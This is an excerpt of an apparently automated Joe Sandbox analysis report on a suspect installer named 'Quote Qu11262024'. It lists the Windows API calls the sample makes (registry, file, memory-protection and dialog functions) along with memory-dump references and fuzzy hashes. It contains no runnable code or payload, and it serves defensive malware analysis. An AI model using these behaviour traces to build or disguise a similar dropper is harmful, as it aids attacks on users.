                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 390214022-0
                                                                                                    • Opcode ID: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
                                                                                                    • Instruction ID: fc3d639ee2ba9d49225374e904560d05d066977e3d8f4235cfc91afb5433c7ac
                                                                                                    • Opcode Fuzzy Hash: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
                                                                                                    • Instruction Fuzzy Hash: 2FE012317005146BD72076B10FCE96F10989BC4308B284D3AF502761C6DDBD4D4245B9
                                                                                                    APIs
                                                                                                    • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PathSearch
                                                                                                    • String ID:
                                                                                                    • API String ID: 2203818243-0
                                                                                                    • Opcode ID: 9529617c9f7bfaff5ac7958b187045ba8f08f990add07776169e03970e12d480
                                                                                                    • Instruction ID: 6eb31aab09df8d412c184d19d03b9e3bb71f92d903eb642ae24e779c7b5562d7
                                                                                                    • Opcode Fuzzy Hash: 9529617c9f7bfaff5ac7958b187045ba8f08f990add07776169e03970e12d480
                                                                                                    • Instruction Fuzzy Hash: 51E020B1300141ABDB00DFA4DD49EEF7B98DF4036CF30453AE111E60C1D2B549419738
                                                                                                    APIs
                                                                                                    • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405FB1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                    • Instruction ID: 6e7719a3fcdda731ed8e347e6155992f38e5baf51167f2b41c6f6c25aa023065
                                                                                                    • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                    • Instruction Fuzzy Hash: D5E0E6B2114509BEEF095F50DD0AD7B371DE704304F10452EFA56D5050E6B5AD305E79
                                                                                                    APIs
                                                                                                    • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040BE6F,0040B8D8,00403261,0040B8D8,0040BE6F,004138D8,00004000,?,00000000,0040308B,00000004), ref: 00405D28
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                                    • Instruction ID: 1f4b5dd365773c199a243262ebdf48a0b98cc88cac0596f8b9dd86c1281a33c5
                                                                                                    • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                                    • Instruction Fuzzy Hash: 8BE0EC3222065AABDF609E559C04AEB7B6CEF05360F008837FD55F3190D635E9219BA8
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138D8,0040B8D8,004032DD,0040A130,0040A130,004031E1,004138D8,00004000,?,00000000,0040308B), ref: 00405CF9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                                                                    • Instruction ID: e323f8ca3bd08c2758c8ba73c9d6efc03229aa5983621b93f4fe5722cd5175fe
                                                                                                    • Opcode Fuzzy Hash: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                                                                    • Instruction Fuzzy Hash: 2FE0863210011EABCF106E909C08BEB775CEF00350F008433FD11E3040E230E8209BA4
                                                                                                    APIs
                                                                                                    • VirtualProtect.KERNELBASE(738E404C,00000004,00000040,738E403C), ref: 738E2903
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2348832635.00000000738E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 738E0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2348743779.00000000738E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348882252.00000000738E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348981073.00000000738E5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 544645111-0
                                                                                                    • Opcode ID: b5dc59762879e33871b4fbe6fbe54823a24ba4c4f193b419052dd92db7ff0434
                                                                                                    • Instruction ID: 9b0ccd35b28c187b281eee19be500254d0416995fbc51562912ad4200f699897
                                                                                                    • Opcode Fuzzy Hash: b5dc59762879e33871b4fbe6fbe54823a24ba4c4f193b419052dd92db7ff0434
                                                                                                    • Instruction Fuzzy Hash: E4F0A5B39C4AA0DEC3E0EFBB84447053FE1A319357B2A453AE19CD7241E37844448F11
                                                                                                    APIs
                                                                                                    • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402373
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString
                                                                                                    • String ID:
                                                                                                    • API String ID: 1096422788-0
                                                                                                    • Opcode ID: de46147d6d5d82b5e111b4c29e7f346d5c0562a281aa24714321742148aa4174
                                                                                                    • Instruction ID: 8e029bd2b2674609338b614665d9252e3eb93026fbeeab8b0acd3e0b98e79a96
                                                                                                    • Opcode Fuzzy Hash: de46147d6d5d82b5e111b4c29e7f346d5c0562a281aa24714321742148aa4174
                                                                                                    • Instruction Fuzzy Hash: 2EE0803090430479DB10AFA18E0AEAD35649F41714F144839F5507B0D1EEB544419B3D
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405FE8,?,?,?,?,00000002,Call), ref: 00405F7E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                    • Instruction ID: 203aced801a2224fff8c5362537aaadf4b9547e108ec4071d54b1f5803f79bdb
                                                                                                    • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                    • Instruction Fuzzy Hash: 68D0123210420EBBDF119F90DD05FAB371DEB04314F108426FE16A4090D775D930AF64
                                                                                                    APIs
                                                                                                    • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: bbdff23eddca307f7cd91ae4a8d94479bcd37e4b62c126e1299400a2ea4d233f
                                                                                                    • Instruction ID: 392b52199529d77ba72f055911e1088dc4dfc38eadc41c9b7a10d64b0619d6e9
                                                                                                    • Opcode Fuzzy Hash: bbdff23eddca307f7cd91ae4a8d94479bcd37e4b62c126e1299400a2ea4d233f
                                                                                                    • Instruction Fuzzy Hash: D4D0127270411197CB10DBE89B489DDB7A4DB80329B318537D111F21D1D6B98A45A72D
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00010442,00000000,00000000,00000000), ref: 004041D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
                                                                                                    • Instruction ID: 62475cc12ad7e502bb70d29232dea1f577caab7405098ae28b662e7a573a39a0
                                                                                                    • Opcode Fuzzy Hash: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
                                                                                                    • Instruction Fuzzy Hash: 05C09BB57407017BEA208F509D4DF1777686750701F2544397770F64D0C6F4D450DA1C
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FDE,?), ref: 004032EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                    • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                    • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000028,?,00000001,00403FD8), ref: 004041B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
                                                                                                    • Instruction ID: 10cfd25431557a88665167ebbf17620150c727a9bd7140e907e4ecff4ccdfc3e
                                                                                                    • Opcode Fuzzy Hash: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
                                                                                                    • Instruction Fuzzy Hash: 30B09236280A00AAEE218B00DE09F457AA2E7A8742F028028B250240B0CAB200A1DB08
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00403F71), ref: 0040419F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
                                                                                                    • Instruction ID: bd711969ba89efe8629f231cafa01baa053f2358784498ab8b3cf30639ef5a41
                                                                                                    • Opcode Fuzzy Hash: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
                                                                                                    • Instruction Fuzzy Hash: 55A012320000009FCB014B50EF04C057F71AB543007018435E140400338A310821FF0C
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B90
                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B9B
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BE5
                                                                                                    • LoadBitmapA.USER32(0000006E), ref: 00404BF8
                                                                                                    • SetWindowLongA.USER32(?,000000FC,0040516F), ref: 00404C11
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C25
                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C37
                                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404C4D
                                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C59
                                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C6B
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404C6E
                                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C99
                                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CA5
                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D3A
                                                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404D65
                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D79
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00404DA8
                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DB6
                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404DC7
                                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EC4
                                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F29
                                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F3E
                                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F62
                                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F82
                                                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 00404F97
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00404FA7
                                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405020
                                                                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 004050C9
                                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050D8
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004050F8
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405146
                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405151
                                                                                                    • ShowWindow.USER32(00000000), ref: 00405158
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                    • String ID: $M$N
                                                                                                    • API String ID: 1638840714-813528018
                                                                                                    • Opcode ID: 1843eae78d99ec7c7d2c9d3c425bc1d7639d2799b4500f086ee6824ea8e69fd2
                                                                                                    • Instruction ID: 91a4408178b324c60ce093aa3ae08ac9a812c52c8545325903dbdedbb0e7fd5b
                                                                                                    • Opcode Fuzzy Hash: 1843eae78d99ec7c7d2c9d3c425bc1d7639d2799b4500f086ee6824ea8e69fd2
                                                                                                    • Instruction Fuzzy Hash: D3024FB0A00209EFEB209F94DD45AAE7BB5FB84315F10413AF614BA2E1D7789D42DF58
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404654
                                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 0040467E
                                                                                                    • SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 0040472F
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040473A
